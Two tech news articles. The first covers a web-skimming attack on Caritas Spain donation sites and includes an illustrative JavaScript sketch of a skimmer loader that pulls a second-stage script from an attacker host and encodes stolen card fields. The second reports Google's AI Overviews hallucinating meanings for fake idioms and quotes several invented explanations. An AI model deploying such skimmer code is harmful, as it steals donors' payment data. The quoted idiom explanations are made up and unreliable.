
Image by Boitumelo on Unsplash
Hackers Target Caritas Charity Sites
- Written by Kiara Fabbri, Former Tech News Writer
- Fact-Checked by Sarah Frazier, Former Content Manager
A cyberattack hit 17 websites of Caritas Spain, a major Catholic charity, compromising donor card data for more than a year without detection.
In a rush? Here are the quick facts:
- Attackers used fake donation forms to steal donor card data.
- The sites used WooCommerce, a popular WordPress plugin.
- Over 60 fake domains supported the attack’s infrastructure.
The attackers used a method called web skimming, in which malicious code is inserted into a website to steal sensitive information from users. In this case, the skimmer created a fake donation form that mimicked the real one and silently captured personal and payment data, including names, addresses, card numbers, CVVs, and more.
“This campaign reinforces a broader trend that has been observed: web skimming infections are increasingly driven by modular kits,” wrote researchers at Jscrambler, who flagged the hack. These kits allow hackers to easily mix different tools and channels to deliver and collect stolen data.
The researchers say that the infected websites were all powered by WooCommerce, a popular plugin for online payments on WordPress. The attack had two parts: first, a tiny piece of hidden code was injected into the site’s homepage to contact the hackers’ server.
Then, the second-stage script added a fake “Continue” button over the real one. Once users clicked it, they were shown a counterfeit online payment form, designed to look like the official gateway from Santander bank.
After capturing the data, the form briefly showed a loading spinner before redirecting the donor to the legitimate payment site, making the scam harder to notice.
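The two-stage flow the researchers describe can be sketched in a few lines of JavaScript. This is an illustration only: the function names, domain, and encoding step are assumptions typical of Magecart-style skimmers, not the actual code found on the Caritas sites.

```javascript
// Hypothetical sketch of a two-stage web skimmer. All names and
// domains are invented for illustration; this is NOT the actual
// code used in the Caritas attack.

// Stage 1: a tiny loader hidden in the homepage that pulls the
// second-stage script from an attacker-controlled server.
function injectSecondStage(doc, attackerHost) {
  const s = doc.createElement("script");
  s.src = "https://" + attackerHost + "/stage2.js"; // hypothetical path
  doc.head.appendChild(s);
}

// Stage 2 (conceptual): once the fake payment form captures input,
// skimmers typically encode the stolen fields so the exfiltration
// request looks innocuous in network logs.
function encodeStolenFields(fields) {
  const query = new URLSearchParams(fields).toString();
  return btoa(query); // base64-encode before sending to a drop server
}
```

Because the first stage is only a few lines long and the real payload lives on a remote server, the injected code is easy to miss in a site audit, which helps explain how the infection went unnoticed for over a year.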
“It’s especially concerning given the target,” Jscrambler noted. “Caritas is a non-profit dedicated to helping vulnerable communities. Still, attackers were happy to keep their skimming operation going […] for over a year.”
The infection was first discovered on March 16, 2025, and the affected websites were eventually taken offline for maintenance in early April after Jscrambler reached out.
By April 11, the malicious code was finally removed. However, the hackers had shifted tactics in the meantime, altering the script to avoid detection.
Researchers also found signs that this group targeted other websites too, using over 60 fake domains to distribute and collect data. Many of these were hosted under the same IP, pointing to a centralized setup. Jscrambler reports that Caritas has not released an official statement about the breach.

Photo by Mitchell Luo on Unsplash
Google’s AI Overviews Goes Viral Again For Hallucinating Fake Idiom Meanings
- Written by Andrea Miliani, Former Tech News Expert
- Fact-Checked by Sarah Frazier, Former Content Manager
Social media users noticed that Google’s AI Overviews feature invents explanations and definitions for fake idioms when they append the word “meaning” to a random phrase. Many of these AI-generated responses have gone viral, sparking laughter among social media users.
In a rush? Here are the quick facts:
- Users on social media noticed Google’s AI Overviews makes up explanations for fake idioms.
- Multiple users on Threads, X, and Bluesky have reported similar hallucinations of absurd, made-up sayings.
- It’s not the first time AI Overviews has gone viral for providing incorrect information.
This isn’t the first time AI Overviews has earned an embarrassing reputation. Last year, Google Search’s AI tool went viral for delivering incorrect answers, some of which were based on outdated Reddit posts, undermining the model’s credibility, reliability, and accuracy.
This time, the AI model has given users “serious” responses to made-up sayings. According to Mashable, this tendency of AI models to produce an answer even when they lack the information needed for a correct one is now known as “AI-splaining.”
“Spit out my coffee. I call this ‘AI-splaining,’” Lily Ray (@lilyraynyc) posted on X on April 20, 2025.
Users shared several examples of the behavior on social media. “Someone on Threads noticed you can type any random sentence into Google, then add ‘meaning’ afterwards, and you’ll get an AI explanation of a famous idiom or phrase you just made up,” wrote a Bluesky user who included screenshots of his test.
He wrote “you can’t lick a badger twice,” followed by the word “meaning”, and the AI model provided an explanation for the fake idiom: “It means you can trick or deceive someone a second time after they’ve been tricked once.” AI Overviews proceeded to provide a more detailed explanation, breaking it down word by word.
“The replies to this thread are very funny, but it’s a warning sign that one of the key functions of Googling – the ability to factcheck a quote, verify a source, or track down something half remembered – will get so much harder if AI prefers to legitimate statistical possibilities over actual truth,” added the user.
A reporter from Yahoo! Tech confirmed the hallucination by entering fake Pokémon idioms such as “Never let your horse play Pokémon,” to which the AI model replied with a completely made-up explanation: “Is a humorous, lighthearted warning against allowing a horse, which is a large animal with a strong will, to engage in activities, like playing video games or the Pokémon card game, that are typically considered human activities.”
Google’s AI Overviews has been expanding to more countries and regions over the past few months, and recently surpassed 1.5 billion users per month.